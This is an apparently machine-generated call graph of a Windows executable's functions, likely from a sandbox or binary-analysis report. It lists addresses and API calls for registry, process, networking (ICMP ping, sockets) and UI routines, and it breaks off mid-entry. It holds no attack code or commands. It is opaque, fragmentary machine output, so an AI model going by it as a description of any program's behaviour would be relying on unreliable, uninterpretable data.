101769->101776 101772 ff19e1 59 API calls 101770->101772 101809 ff1364 59 API calls 2 library calls 101771->101809 101772->101779 101774 fe477a 59 API calls 101774->101779 101775 1025dec 101777 fe477a 59 API calls 101775->101777 101776->101742 101777->101769 101778 fe43d0 59 API calls 101778->101779 101779->101742 101779->101774 101779->101778 101780 1025cc2 101779->101780 101805 ff1364 59 API calls 2 library calls 101779->101805 101781 1025cfb 101780->101781 101782 1025cec 101780->101782 101793 fe477a 101781->101793 101807 ff153b 59 API calls 2 library calls 101782->101807 101787 1025d1c 101788 ff19e1 59 API calls 101787->101788 101788->101729 101790 1000fe6 Mailbox 59 API calls 101789->101790 101791 ff4351 101790->101791 101791->101705 101792->101708 101794 1000fe6 Mailbox 59 API calls 101793->101794 101795 fe4787 101794->101795 101796 fe43d0 101795->101796 101797 101d6c9 101796->101797 101799 fe43e7 101796->101799 101797->101799 101811 fe40cb 59 API calls Mailbox 101797->101811 101800 fe44e8 101799->101800 101801 fe4530 101799->101801 101804 fe44ef 101799->101804 101803 1000fe6 Mailbox 59 API calls 101800->101803 101810 fe523c 59 API calls 101801->101810 101803->101804 101804->101787 101805->101779 101806->101766 101807->101729 101808->101762 101809->101775 101810->101804 101811->101799 101813 1044cf0 101812->101813 101814 1044d09 101812->101814 101813->101814 101817 1044d0f 101813->101817 101818 100385c GetStringTypeW _iswctype 101813->101818 101819 10037c3 59 API calls __wcstoi64 101814->101819 101817->100958 101818->101813 101819->101817 101821 fe3b3f 101820->101821 101827 fe3b67 101820->101827 101822 fe3b4d 101821->101822 101823 fe3b31 59 API calls 101821->101823 101824 fe3b53 101822->101824 101825 fe3b31 59 API calls 101822->101825 101823->101822 101824->101827 101830 fe5190 59 API calls Mailbox 101824->101830 101825->101824 101827->100665 101828->100671 101829->100663 101830->101827 101832 fe3c43 101831->101832 101833 fe3e11 101831->101833 101834 ff1207 59 API calls 101832->101834 101837 fe3c54 101832->101837 101833->100685 101835 fe3e73 101834->101835 101836 1002f70 __cinit 67 API calls 101835->101836 101836->101837 101837->100685 101838->100691 101839->100691 101840->100722 101841->100722 101842->100713 101843->100723 101844->100726 101845->100723 101846->100723 101847 fe107d 101852 ff2fc5 101847->101852 101849 fe108c 101850 1002f70 __cinit 67 API calls 101849->101850 101851 fe1096 101850->101851 101853 ff2fd5 __write_nolock 101852->101853 101854 ff1207 59 API calls 101853->101854 101855 ff308b 101854->101855 101883 10000cf 101855->101883 101857 ff3094 101890 10008c1 101857->101890 101860 ff1900 59 API calls 101861 ff30ad 101860->101861 101896 ff4c94 101861->101896 101864 ff1207 59 API calls 101865 ff30c5 101864->101865 101866 ff19e1 59 API calls 101865->101866 101867 ff30ce RegOpenKeyExW 101866->101867 101868 10301a3 RegQueryValueExW 101867->101868 101872 ff30f0 Mailbox 101867->101872 101869 10301c0 101868->101869 101870 1030235 RegCloseKey 101868->101870 101871 1000fe6 Mailbox 59 API calls 101869->101871 101870->101872 101882 1030247 _wcscat Mailbox __NMSG_WRITE 101870->101882 101873 10301d9 101871->101873 101872->101849 101875 ff433f 59 API calls 101873->101875 101874 ff1609 59 API calls 101874->101882 101876 10301e4 RegQueryValueExW 101875->101876 101877 1030201 101876->101877 101879 103021b 101876->101879 101878 ff1821 59 API calls 101877->101878 101878->101879 101879->101870 101880 ff1a36 59 API calls 101880->101882 101881 ff4c94 59 API calls 101881->101882 101882->101872 101882->101874 101882->101880 101882->101881 101884 1011b70 __write_nolock 101883->101884 101885 10000dc GetModuleFileNameW 101884->101885 101886 ff1a36 59 API calls 101885->101886 101887 1000102 101886->101887 101888 1000284 60 API calls 101887->101888 101889 100010c Mailbox 101888->101889 101889->101857 101891 1011b70 __write_nolock 101890->101891 101892 10008ce GetFullPathNameW 101891->101892 101893 10008f0 101892->101893 101894 ff1821 59 API calls 101893->101894 101895 ff309f 101894->101895 101895->101860 101897 ff4ca2 101896->101897 101901 ff4cc4 _memmove 101896->101901 101899 1000fe6 Mailbox 59 API calls 101897->101899 101898 1000fe6 Mailbox 59 API calls 101900 ff30bc 101898->101900 101899->101901 101900->101864 101901->101898 101902 1007e83 101903 1007e8f __mtinitlocknum 101902->101903 101939 100a038 GetStartupInfoW 101903->101939 101905 1007e94 101941 1008dac GetProcessHeap 101905->101941 101907 1007eec 101908 1007ef7 101907->101908 102024 1007fd3 58 API calls 3 library calls 101907->102024 101942 1009d16 101908->101942 101911 1007efd 101912 1007f08 __RTC_Initialize 101911->101912 102025 1007fd3 58 API calls 3 library calls 101911->102025 101963 100d802 101912->101963 101915 1007f17 101916 1007f23 GetCommandLineW 101915->101916 102026 1007fd3 58 API calls 3 library calls 101915->102026 101982 1015153 GetEnvironmentStringsW 101916->101982 101919 1007f22 101919->101916 101922 1007f3d 101923 1007f48 101922->101923 102027 10032e5 58 API calls 3 library calls 101922->102027 101992 1014f88 101923->101992 101926 1007f4e 101927 1007f59 101926->101927 102028 10032e5 58 API calls 3 library calls 101926->102028 102006 100331f 101927->102006 101930 1007f61 101931 1007f6c __wwincmdln 101930->101931 102029 10032e5 58 API calls 3 library calls 101930->102029 102012 ff5f8b 101931->102012 101934 1007f80 101935 1007f8f 101934->101935 102030 1003588 58 API calls _doexit 101934->102030 102031 1003310 58 API calls _doexit 101935->102031 101938 1007f94 __mtinitlocknum 101940 100a04e 101939->101940 101940->101905 101941->101907 102032 10033b7 EncodePointer 101942->102032 101944 1009d1b 102037 1009f6c 101944->102037 101946 1009d24 102050 1009d8c 61 API calls 2 library calls 101946->102050 101950 1009d29 101950->101911 101952 1009d41 102044 1008a05 101952->102044 101955 1009d83 102053 1009d8c 61 API calls 2 library calls 101955->102053 101958 1009d62 101958->101955 101960 1009d68 101958->101960 101959 1009d88 101959->101911 102052 1009c63 58 API calls 4 library calls 101960->102052 101962 1009d70 GetCurrentThreadId 101962->101911 101964 100d80e __mtinitlocknum 101963->101964 101965 1009e3b __lock 58 API calls 101964->101965 101966 100d815 101965->101966 101967 1008a05 __calloc_crt 58 API calls 101966->101967 101968 100d826 101967->101968 101969 100d891 GetStartupInfoW 101968->101969 101970 100d831 __mtinitlocknum @_EH4_CallFilterFunc@8 101968->101970 101976 100d8a6 101969->101976 101979 100d9d5 101969->101979 101970->101915 101971 100da9d 102069 100daad LeaveCriticalSection _doexit 101971->102069 101973 1008a05 __calloc_crt 58 API calls 101973->101976 101974 100da22 GetStdHandle 101974->101979 101975 100da35 GetFileType 101975->101979 101976->101973 101977 100d8f4 101976->101977 101976->101979 101978 100d928 GetFileType 101977->101978 101977->101979 102067 100a05b InitializeCriticalSectionAndSpinCount 101977->102067 101978->101977 101979->101971 101979->101974 101979->101975 102068 100a05b InitializeCriticalSectionAndSpinCount 101979->102068 101983 1007f33 101982->101983 101984 1015164 101982->101984 101988 1014d4b GetModuleFileNameW 101983->101988 102070 1008a4d 58 API calls 2 library calls 101984->102070 101986 101518a _memmove 101987 10151a0 FreeEnvironmentStringsW 101986->101987 101987->101983 101989 1014d7f _wparse_cmdline 101988->101989 101991 1014dbf _wparse_cmdline 101989->101991 102071 1008a4d 58 API calls 2 library calls 101989->102071 101991->101922 101993 1014fa1 __NMSG_WRITE 101992->101993 101994 1014f99 101992->101994 101995 1008a05 __calloc_crt 58 API calls 101993->101995 101994->101926 101996 1014fca __NMSG_WRITE 101995->101996 101996->101994 101998 1015021 101996->101998 101999 1008a05 __calloc_crt 58 API calls 101996->101999 102000 1015046 101996->102000 102003 101505d 101996->102003 102072 1014837 58 API calls 2 library calls 101996->102072 101997 1002f85 _free 58 API calls 101997->101994 101998->101997 101999->101996 102001 1002f85 _free 58 API calls 102000->102001 102001->101994 102073 1008ff6 IsProcessorFeaturePresent 102003->102073 102007 100332b __IsNonwritableInCurrentImage 102006->102007 102096 100a701 102007->102096 102009 1003349 __initterm_e 102010 1002f70 __cinit 67 API calls 102009->102010 102011 1003368 _doexit __IsNonwritableInCurrentImage 102009->102011 102010->102011 102011->101930 102013 ff6044 102012->102013 102014 ff5fa5 102012->102014 102013->101934 102015 ff5fdf IsThemeActive 102014->102015 102099 100359c 102015->102099 102019 ff600b 102111 ff5f00 SystemParametersInfoW SystemParametersInfoW 102019->102111 102021 ff6017 102112 ff5240 102021->102112 102023 ff601f SystemParametersInfoW 102023->102013 102024->101908 102025->101912 102026->101919 102030->101935 102031->101938 102033 10033c8 __init_pointers __initp_misc_winsig 102032->102033 102054 100a754 EncodePointer 102033->102054 102035 10033e0 __init_pointers 102036 100a0c9 34 API calls 102035->102036 102036->101944 102038 1009f78 102037->102038 102040 1009d20 102038->102040 102055 100a05b InitializeCriticalSectionAndSpinCount 102038->102055 102040->101946 102041 1009fba 102040->102041 102042 1009fd1 TlsAlloc 102041->102042 102043 1009d36 102041->102043 102043->101946 102043->101952 102046 1008a0c 102044->102046 102047 1008a47 102046->102047 102048 1008a2a 102046->102048 102056 1015426 102046->102056 102047->101955 102051 100a016 TlsSetValue 102047->102051 102048->102046 102048->102047 102064 100a362 Sleep 102048->102064 102050->101950 102051->101958 102052->101962 102053->101959 102054->102035 102055->102038 102057 1015431 102056->102057 102059 101544c 102056->102059 102058 101543d 102057->102058 102057->102059 102065 1008d58 58 API calls __getptd_noexit 102058->102065 102060 101545c RtlAllocateHeap 102059->102060 102062 1015442 102059->102062 102066 10035d1 DecodePointer 102059->102066 102060->102059 102060->102062 102062->102046 102064->102048 102065->102062 102066->102059 102067->101977 102068->101979 102069->101970 102070->101986 102071->101991 102072->101996 102074 1009001 102073->102074 102079 1008e89 102074->102079 102078 100901c 102078->101926 102080 1008ea3 _memset __call_reportfault 102079->102080 102081 1008ec3 IsDebuggerPresent 102080->102081 102087 100a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 102081->102087 102084 1008faa 102086 100a370 GetCurrentProcess TerminateProcess 102084->102086 102085 1008f87 __call_reportfault 102088 100c826 102085->102088 102086->102078 102087->102085 102089 100c830 IsProcessorFeaturePresent 102088->102089 102090 100c82e 102088->102090 102092 1015b3a 102089->102092 102090->102084 102095 1015ae9 5 API calls 2 library calls 102092->102095 102094 1015c1d 102094->102084 102095->102094 102097 100a704 EncodePointer 102096->102097 102097->102097 102098 100a71e 102097->102098 102098->102009 102100 1009e3b __lock 58 API calls 102099->102100 102101 10035a7 DecodePointer EncodePointer 102100->102101 102164 1009fa5 LeaveCriticalSection 102101->102164 102103 ff6004 102104 1003604 102103->102104 102105 1003628 102104->102105 102106 100360e 102104->102106 102105->102019 102106->102105 102165 1008d58 58 API calls __getptd_noexit 102106->102165 102108 1003618 102166 1008fe6 9 API calls __woutput_l 102108->102166 102110 1003623 102110->102019 102111->102021 102113 ff524d __write_nolock 102112->102113 102114 ff1207 59 API calls 102113->102114 102115 ff5258 GetCurrentDirectoryW 102114->102115 102167 ff4ec8 102115->102167 102117 ff527e IsDebuggerPresent 102118 1030b21 MessageBoxA 102117->102118 102119 ff528c 102117->102119 102120 1030b39 102118->102120 102119->102120 102121 ff52a0 102119->102121 102290 ff314d 59 API calls Mailbox 102120->102290 102235 ff31bf 102121->102235 102124 1030b49 102131 1030b5f SetCurrentDirectoryW 102124->102131 102129 ff536c Mailbox 102129->102023 102131->102129 102164->102103 102165->102108 102166->102110 102168 ff1207 59 API calls 102167->102168 102169 ff4ede 102168->102169 102292 ff5420 102169->102292 102171 ff4efc 102172 ff19e1 59 API calls 102171->102172 102173 ff4f10 102172->102173 102174 ff1c9c 59 API calls 102173->102174 102175 ff4f1b 102174->102175 102176 fe477a 59 API calls 102175->102176 102177 ff4f27 102176->102177 102178 ff1a36 59 API calls 102177->102178 102179 ff4f34 102178->102179 102180 fe39be 68 API calls 102179->102180 102181 ff4f44 Mailbox 102180->102181 102182 ff1a36 59 API calls 102181->102182 102183 ff4f68 102182->102183 102184 fe39be 68 API calls 102183->102184 102185 ff4f77 Mailbox 102184->102185 102186 ff1207 59 API calls 102185->102186 102187 ff4f94 102186->102187 102306 ff55bc 102187->102306 102191 ff4fae 102192 1030a54 102191->102192 102193 ff4fb8 102191->102193 102194 ff55bc 59 API calls 102192->102194 102195 100312d _W_store_winword 60 API calls 102193->102195 102196 1030a68 102194->102196 102197 ff4fc3 102195->102197 102199 ff55bc 59 API calls 102196->102199 102197->102196 102198 ff4fcd 102197->102198 102200 100312d _W_store_winword 60 API calls 102198->102200 102201 1030a84 102199->102201 102202 ff4fd8 102200->102202 102204 10000cf 61 API calls 102201->102204 102202->102201 102203 ff4fe2 102202->102203 102205 100312d _W_store_winword 60 API calls 102203->102205 102207 1030aa7 102204->102207 102206 ff4fed 102205->102206 102209 ff4ff7 102206->102209 102210 1030ad0 102206->102210 102208 ff55bc 59 API calls 102207->102208 102211 1030ab3 102208->102211 102212 ff501b 102209->102212 102215 ff1c9c 59 API calls 102209->102215 102213 ff55bc 59 API calls 102210->102213 102214 ff1c9c 59 API calls 102211->102214 102219 fe47be 59 API calls 102212->102219 102216 1030aee 102213->102216 102217 1030ac1 102214->102217 102218 ff500e 102215->102218 102220 ff1c9c 59 API calls 102216->102220 102221 ff55bc 59 API calls 102217->102221 102222 ff55bc 59 API calls 102218->102222 102223 ff502a 102219->102223 102224 1030afc 102220->102224 102221->102210 102222->102212 102225 fe4540 59 API calls 102223->102225 102226 ff55bc 59 API calls 102224->102226 102227 ff5038 102225->102227 102228 1030b0b 102226->102228 102229 fe43d0 59 API calls 102227->102229 102228->102228 102232 ff5055 102229->102232 102230 fe477a 59 API calls 102230->102232 102231 fe43d0 59 API calls 102231->102232 102232->102230 102232->102231 102233 ff55bc 59 API calls 102232->102233 102234 ff509b Mailbox 102232->102234 102233->102232 102234->102117 102236 ff31cc __write_nolock 102235->102236 102237 1030314 _memset 102236->102237 102238 ff31e5 102236->102238 102241 1030330 GetOpenFileNameW 102237->102241 102239 1000284 60 API calls 102238->102239 102240 ff31ee 102239->102240 102325 10009c5 102240->102325 102243 103037f 102241->102243 102245 ff1821 59 API calls 102243->102245 102247 1030394 102245->102247 102247->102247 102248 ff3203 102343 ff278a 102248->102343 102290->102124 102293 ff542d __write_nolock 102292->102293 102294 ff1821 59 API calls 102293->102294 102299 ff5590 Mailbox 102293->102299 102296 ff545f 102294->102296 102295 ff1609 59 API calls 102295->102296 102296->102295 102302 ff5495 Mailbox 102296->102302 102297 ff5563 102298 ff1a36 59 API calls 102297->102298 102297->102299 102300 ff5584 102298->102300 102299->102171 102303 ff4c94 59 API calls 102300->102303 102301 ff1a36 59 API calls 102301->102302 102302->102297 102302->102299 102302->102301 102304 ff4c94 59 API calls 102302->102304 102305 ff1609 59 API calls 102302->102305 102303->102299 102304->102302 102305->102302 102307 ff55df 102306->102307 102308 ff55c6 102306->102308 102309 ff1821 59 API calls 102307->102309 102310 ff1c9c 59 API calls 102308->102310 102311 ff4fa0 102309->102311 102310->102311 102312 100312d 102311->102312 102313 10031ae 102312->102313 102314 1003139 102312->102314 102324 10031c0 60 API calls 4 library calls 102313->102324 102321 100315e 102314->102321 102322 1008d58 58 API calls __getptd_noexit 102314->102322 102316 10031bb 102316->102191 102318 1003145 102323 1008fe6 9 API calls __woutput_l 102318->102323 102320 1003150 102320->102191 102321->102191 102322->102318 102323->102320 102324->102316 102326 1011b70 __write_nolock 102325->102326 102327 10009d2 GetLongPathNameW 102326->102327 102328 ff1821 59 API calls 102327->102328 102329 ff31f7 102328->102329 102330 ff2f3d 102329->102330 102331 ff1207 59 API calls 102330->102331 102332 ff2f4f 102331->102332 102333 1000284 60 API calls 102332->102333 102334 ff2f5a 102333->102334 102335 1030177 102334->102335 102336 ff2f65 102334->102336 102337 ff151f 61 API calls 102335->102337 102340 1030191 102335->102340 102338 ff4c94 59 API calls 102336->102338 102337->102335 102339 ff2f71 102338->102339 102377 fe1307 102339->102377 102342 ff2f84 Mailbox 102342->102248 102383 ff49c2 102343->102383 102378 fe1319 102377->102378 102382 fe1338 _memmove 102377->102382 102380 1000fe6 Mailbox 59 API calls 102378->102380 102379 1000fe6 Mailbox 59 API calls 102381 fe134f 102379->102381 102380->102382 102381->102342 102382->102379 102567 ff4b29 102383->102567 102616 ff4b77 102567->102616 102569 ff4b50 102572 ff49d4 102569->102572 102573 ff4b60 FreeLibrary 102569->102573 102571 ff4b77 2 API calls 102571->102569 102574 100547b 102572->102574 102573->102572 102620 1005490 102574->102620 102617 ff4b44 102616->102617 102618 ff4b80 LoadLibraryA 102616->102618 102617->102569 102617->102571 102618->102617 102619 ff4b91 GetProcAddress 102618->102619 102619->102617 102621 100549c __mtinitlocknum 102620->102621 102622 10054af 102621->102622 102624 10054e0 102621->102624 103170 fe1016 103175 ff5ce7 103170->103175 103173 1002f70 __cinit 67 API calls 103174 fe1025 103173->103174 103176 1000fe6 Mailbox 59 API calls 103175->103176 103177 ff5cef 103176->103177 103178 fe101b 103177->103178 103182 ff5f39 103177->103182 103178->103173 103183 ff5cfb 103182->103183 103184 ff5f42 103182->103184 103186 ff5d13 103183->103186 103185 1002f70 __cinit 67 API calls 103184->103185 103185->103183 103187 ff1207 59 API calls 103186->103187 103188 ff5d2b GetVersionExW 103187->103188 103189 ff1821 59 API calls 103188->103189 103190 ff5d6e 103189->103190 103191 ff1981 59 API calls 103190->103191 103201 ff5d9b 103190->103201 103192 ff5d8f 103191->103192 103193 ff133d 59 API calls 103192->103193 103193->103201 103194 ff5e00 GetCurrentProcess IsWow64Process 103195 ff5e19 103194->103195 103197 ff5e2f 103195->103197 103198 ff5e98 GetSystemInfo 103195->103198 103196 1031098 103210 ff55f0 103197->103210 103199 ff5e65 103198->103199 103199->103178 103201->103194 103201->103196 103203 ff5e8c GetSystemInfo 103206 ff5e56 103203->103206 103204 ff5e41 103205 ff55f0 2 API calls 103204->103205 103207 ff5e49 GetNativeSystemInfo 103205->103207 103206->103199 103208 ff5e5c FreeLibrary 103206->103208 103207->103206 103208->103199 103211 ff5619 103210->103211 103212 ff55f9 LoadLibraryA 103210->103212 103211->103203 103211->103204 103212->103211 103213 ff560a GetProcAddress 103212->103213 103213->103211 103214 fe1055 103219 fe2a19 103214->103219 103217 1002f70 __cinit 67 API calls 103218 fe1064 103217->103218 103220 ff1207 59 API calls 103219->103220 103221 fe2a87 103220->103221 103226 fe1256 103221->103226 103224 fe2b24 103225 fe105a 103224->103225 103229 fe13f8 59 API calls 2 library calls 103224->103229 103225->103217 103230 fe1284 103226->103230 103229->103224 103231 fe1275 103230->103231 103232 fe1291 103230->103232 103231->103224 103232->103231 103233 fe1298 RegOpenKeyExW 103232->103233 103233->103231 103234 fe12b2 RegQueryValueExW 103233->103234 103235 fe12e8 RegCloseKey 103234->103235 103236 fe12d3 103234->103236 103235->103231 103236->103235 103237 fe5ff5 103260 fe5ede Mailbox _memmove 103237->103260 103238 1000fe6 59 API calls Mailbox 103238->103260 103239 fe6a9b 103450 fea9de 301 API calls 103239->103450 103240 fe53b0 301 API calls 103240->103260 103242 101eff9 103463 fe5190 59 API calls Mailbox 103242->103463 103244 101f007 103464 104a48d 89 API calls 4 library calls 103244->103464 103248 101efeb 103279 fe5569 Mailbox 103248->103279 103462 1036cf1 59 API calls Mailbox 103248->103462 103249 fe60e5 103250 101e137 103249->103250 103254 fe63bd Mailbox 103249->103254 103262 fe6abc 103249->103262 103281 fe6152 Mailbox 103249->103281 103250->103254 103451 1037aad 59 API calls 103250->103451 103251 ff1c9c 59 API calls 103251->103260 103253 ff1a36 59 API calls 103253->103260 103256 1000fe6 Mailbox 59 API calls 103254->103256 103268 fe6426 103254->103268 103259 fe63d1 103256->103259 103258 105c355 301 API calls 103258->103260 103261 fe63de 103259->103261 103259->103262 103260->103238 103260->103239 103260->103240 103260->103242 103260->103244 103260->103249 103260->103251 103260->103253 103260->103258 103260->103262 103260->103279 103449 fe523c 59 API calls 103260->103449 103454 1047f11 59 API calls Mailbox 103260->103454 103455 1036cf1 59 API calls Mailbox 103260->103455 103264 101e172 103261->103264 103265 fe6413 103261->103265 103461 104a48d 89 API calls 4 library calls 103262->103461 103452 105c87c 85 API calls 2 library calls 103264->103452 103265->103268 103289 fe5447 Mailbox 103265->103289 103453 105c9c9 95 API calls Mailbox 103268->103453 103270 101e19d 103270->103270 103272 101e691 103458 104a48d 89 API calls 4 library calls 103272->103458 103273 101f165 103466 104a48d 89 API calls 4 library calls 103273->103466 103274 1000fe6 59 API calls Mailbox 103274->103289 103276 fe69fa 103286 ff1c9c 59 API calls 103276->103286 103280 ff1c9c 59 API calls 103280->103289 103281->103248 103281->103262 103281->103279 103300 105f1b2 91 API calls 103281->103300 103302 105e60c 130 API calls 103281->103302 103305 104412a 3 API calls 103281->103305 103308 fed679 103281->103308 103348 104d6be 103281->103348 103393 fecfd7 103281->103393 103412 105ebba 103281->103412 103418 1055e1d 103281->103418 103443 104413a 103281->103443 103448 fe5190 59 API calls Mailbox 103281->103448 103456 fe41c4 59 API calls Mailbox 103281->103456 103457 1037aad 59 API calls 103281->103457 103282 fe69ff 103282->103272 103282->103273 103283 101e6a0 103284 101ea9a 103287 ff1c9c 59 API calls 103284->103287 103286->103279 103287->103279 103289->103272 103289->103274 103289->103276 103289->103279 103289->103280 103289->103282 103289->103284 103290 ff1207 59 API calls 103289->103290 103292 101eb67 103289->103292 103293 1037aad 59 API calls 103289->103293 103294 1002f70 67 API calls __cinit 103289->103294 103296 101ef28 103289->103296 103298 fe5a1a 103289->103298 103446 fe7e50 301 API calls 2 library calls 103289->103446 103447 fe6e30 60 API calls Mailbox 103289->103447 103290->103289 103292->103279 103459 1037aad 59 API calls 103292->103459 103293->103289 103294->103289 103460 104a48d 89 API calls 4 library calls 103296->103460 103465 104a48d 89 API calls 4 library calls 103298->103465 103300->103281 103302->103281 103305->103281 103467 fe4f98 103308->103467 103312 1000fe6 Mailbox 59 API calls 103313 fed6aa 103312->103313 103316 fed6ba 103313->103316 103494 ff3df7 60 API calls Mailbox 103313->103494 103314 1025068 103315 fed6df 103314->103315 103499 104fbb7 59 API calls 103314->103499 103320 fe502b 59 API calls 103315->103320 103324 fed6ec 103315->103324 103318 fe4d37 84 API calls 103316->103318 103319 fed6c8 103318->103319 103321 ff3e47 67 API calls 103319->103321 103322 10250b0 103320->103322 103323 fed6d7 103321->103323 103322->103324 103325 10250b8 103322->103325 103323->103314 103323->103315 103498 ff3f0b CloseHandle 103323->103498 103480 ff41d6 103324->103480 103327 fe502b 59 API calls 103325->103327 103329 fed6f3 103327->103329 103330 fed70d 103329->103330 103331 10250ca 103329->103331 103333 ff1207 59 API calls 103330->103333 103332 1000fe6 Mailbox 59 API calls 103331->103332 103334 10250d0 103332->103334 103335 fed715 103333->103335 103336 10250e4 103334->103336 103338 ff3ea1 2 API calls 103334->103338 103495 ff3b7b 65 API calls Mailbox 103335->103495 103342 10250e8 _memmove 103336->103342 103485 1047c7f 103336->103485 103338->103336 103340 fed724 103340->103342 103496 fe4f3c 59 API calls Mailbox 103340->103496 103343 fed738 Mailbox 103344 fed772 103343->103344 103345 ff42cf CloseHandle 103343->103345 103344->103281 103346 fed766 103345->103346 103346->103344 103497 ff3f0b CloseHandle 103346->103497 103349 104d6dd 103348->103349 103350 104d6e8 103348->103350 103351 fe502b 59 API calls 103349->103351 103353 ff1207 59 API calls 103350->103353 103389 104d7c2 Mailbox 103350->103389 103351->103350 103352 1000fe6 Mailbox 59 API calls 103354 104d80b 103352->103354 103355 104d70c 103353->103355 103356 104d817 103354->103356 103500 ff3df7 60 API calls Mailbox 103354->103500 103357 ff1207 59 API calls 103355->103357 103359 fe4d37 84 API calls 103356->103359 103360 104d715 103357->103360 103361 104d82f 103359->103361 103362 fe4d37 84 API calls 103360->103362 103363 ff3e47 67 API calls 103361->103363 103364 104d721 103362->103364 103365 104d83e 103363->103365 103366 1000119 59 API calls 103364->103366 103367 104d876 103365->103367 103368 104d842 GetLastError 103365->103368 103369 104d736 103366->103369 103372 104d8a1 103367->103372 103373 104d8d8 103367->103373 103370 104d85b 103368->103370 103371 ff17e0 59 API calls 103369->103371 103390 104d7cb Mailbox 103370->103390 103501 ff3f0b CloseHandle 103370->103501 103374 104d769 103371->103374 103375 1000fe6 Mailbox 59 API calls 103372->103375 103376 1000fe6 Mailbox 59 API calls 103373->103376 103381 104412a 3 API calls 103374->103381 103392 104d793 Mailbox 103374->103392 103378 104d8a6 103375->103378 103377 104d8dd 103376->103377 103384 ff1207 59 API calls 103377->103384 103377->103390 103382 104d8b7 103378->103382 103385 ff1207 59 API calls 103378->103385 103380 fe502b 59 API calls 103380->103389 103383 104d779 103381->103383 103502 104fc0d 59 API calls 2 library calls 103382->103502 103386 ff1a36 59 API calls 103383->103386 103383->103392 103384->103390 103385->103382 103388 104d78a 103386->103388 103391 1043f1d 63 API calls 103388->103391 103389->103352 103389->103390 103390->103281 103391->103392 103392->103380 103394 fe4d37 84 API calls 103393->103394 103395 fed001 103394->103395 103503 fe5278 103395->103503 103397 fed018 103398 fe502b 59 API calls 103397->103398 103399 fed57b 103397->103399 103408 fed439 Mailbox __NMSG_WRITE 103397->103408 103398->103408 103399->103281 103400 100312d _W_store_winword 60 API calls 103400->103408 103401 ff162d 59 API calls 103401->103408 103402 fe4f98 59 API calls 103402->103408 103403 1000c65 62 API calls 103403->103408 103406 fe4d37 84 API calls 103406->103408 103407 fe502b 59 API calls 103407->103408 103408->103399 103408->103400 103408->103401 103408->103402 103408->103403 103408->103406 103408->103407 103409 ff1821 59 API calls 103408->103409 103410 ff59d3 94 API calls 103408->103410 103411 ff5ac3 Shell_NotifyIconW 103408->103411 103508 ff153b 59 API calls 2 library calls 103408->103508 103509 fe4f3c 59 API calls Mailbox 103408->103509 103409->103408 103410->103408 103411->103408 103416 105ebcd 103412->103416 103413 fe4d37 84 API calls 103414 105ec0a 103413->103414 103510 1047ce4 103414->103510 103416->103413 103417 105ebdc 103416->103417 103417->103281 103419 1055e46 103418->103419 103420 1055e74 WSAStartup 103419->103420 103422 fe502b 59 API calls 103419->103422 103421 1055e9d 103420->103421 103442 1055e88 Mailbox 103420->103442 103423 ff40cd 59 API calls 103421->103423 103424 1055e61 103422->103424 103425 1055ea6 103423->103425 103424->103420 103426 fe502b 59 API calls 103424->103426 103427 fe4d37 84 API calls 103425->103427 103428 1055e70 103426->103428 103429 1055eb2 103427->103429 103428->103420 103430 ff402a 61 API calls 103429->103430 103431 1055ebf inet_addr gethostbyname 103430->103431 103432 1055edd IcmpCreateFile 103431->103432 103431->103442 103433 1055f01 103432->103433 103432->103442 103434 1000fe6 Mailbox 59 API calls 103433->103434 103435 1055f1a 103434->103435 103436 ff433f 59 API calls 103435->103436 103437 1055f25 103436->103437 103438 1055f55 IcmpSendEcho 103437->103438 103439 1055f34 IcmpSendEcho 103437->103439 103440 1055f6d 103438->103440 103439->103440 103441 1055fd4 IcmpCloseHandle WSACleanup 103440->103441 103441->103442 103442->103281 103444 104494a 3 API calls 103443->103444 103445 104413f 103444->103445 103445->103281 103446->103289 103447->103289 103448->103281 103449->103260 103450->103262 103451->103254 103452->103268 103453->103270 103454->103260 103455->103260 103456->103281 103457->103281 103458->103283 103459->103279 103460->103298 103461->103248 103462->103279 103463->103248 103464->103248 103465->103279 103466->103279 103468 fe4fa8 103467->103468 103469 101dd2b 103467->103469 103473 1000fe6 Mailbox 59 API calls 103468->103473 103470 101dd3c 103469->103470 103471 ff1821 59 API calls 103469->103471 103472 ff19e1 59 API calls 103470->103472 103471->103470 103477 101dd46 103472->103477 103474 fe4fbb 103473->103474 103475 fe4fc6 103474->103475 103474->103477 103476 fe4fd4 103475->103476 103478 ff1a36 59 API calls 103475->103478 103476->103312 103476->103314 103477->103476 103479 ff1207 59 API calls 103477->103479 103478->103476 103479->103476 103481 ff410a 2 API calls 103480->103481 103482 ff41f7 103481->103482 103483 ff410a 2 API calls 103482->103483 103484 ff420b 103483->103484 103484->103329 103486 1047c8a 103485->103486 103487 1000fe6 Mailbox 59 API calls 103486->103487 103488 1047c91 103487->103488 103489 1047c9d 103488->103489 103490 1047cbe 103488->103490 103491 1000fe6 Mailbox 59 API calls 103489->103491 103492 1000fe6 Mailbox 59 API calls 103490->103492 103493 1047ca6 _memset 103491->103493 103492->103493 103493->103342 103494->103316 103495->103340 103496->103343 103497->103344 103498->103314 103499->103314 103500->103356 103501->103390 103502->103390 103504 1000fe6 Mailbox 59 API calls 103503->103504 103505 fe5285 103504->103505 103506 fe5294 103505->103506 103507 ff1a36 59 API calls 103505->103507 103506->103397 103507->103506 103508->103408 103509->103408 103511 1047cf1 103510->103511 103512 1000fe6 Mailbox 59 API calls 103511->103512 103513 1047cf8 103512->103513 103516 1046135 103513->103516 103515 1047d3b Mailbox 103515->103417 103517 ff1aa4 59 API calls 103516->103517 103518 1046148 CharLowerBuffW 103517->103518 103521 104615b 103518->103521 103519 1046165 _memset Mailbox 103519->103515 103520 1046195 103523 10461a7 103520->103523 103525 ff1609 59 API calls 103520->103525 103521->103519 103521->103520 103522 ff1609 59 API calls 103521->103522 103522->103521 103524 1000fe6 Mailbox 59 API calls 103523->103524 103528 10461d5 103524->103528 103525->103523 103530 10461f4 103528->103530 103549 1046071 59 API calls 103528->103549 103529 1046233 103529->103519 103531 1000fe6 Mailbox 59 API calls 103529->103531 103534 1046292 103530->103534 103532 104624d 103531->103532 103533 1000fe6 Mailbox 59 API calls 103532->103533 103533->103519 103535 ff1207 59 API calls 103534->103535 103536 10462c4 103535->103536 103537 ff1207 59 API calls 103536->103537 103538 10462cd 103537->103538 103539 ff1207 59 API calls 103538->103539 103545 10462d6 _wcscmp 103539->103545 103540 ff1821 59 API calls 103540->103545 103541 1003836 GetStringTypeW 103541->103545 103543 10037ba 59 API calls 103543->103545 103544 1046292 60 API calls 103544->103545 103545->103540 103545->103541 103545->103543 103545->103544 103546 ff153b 59 API calls 103545->103546 103547 10465ab Mailbox 103545->103547 103548 ff1c9c 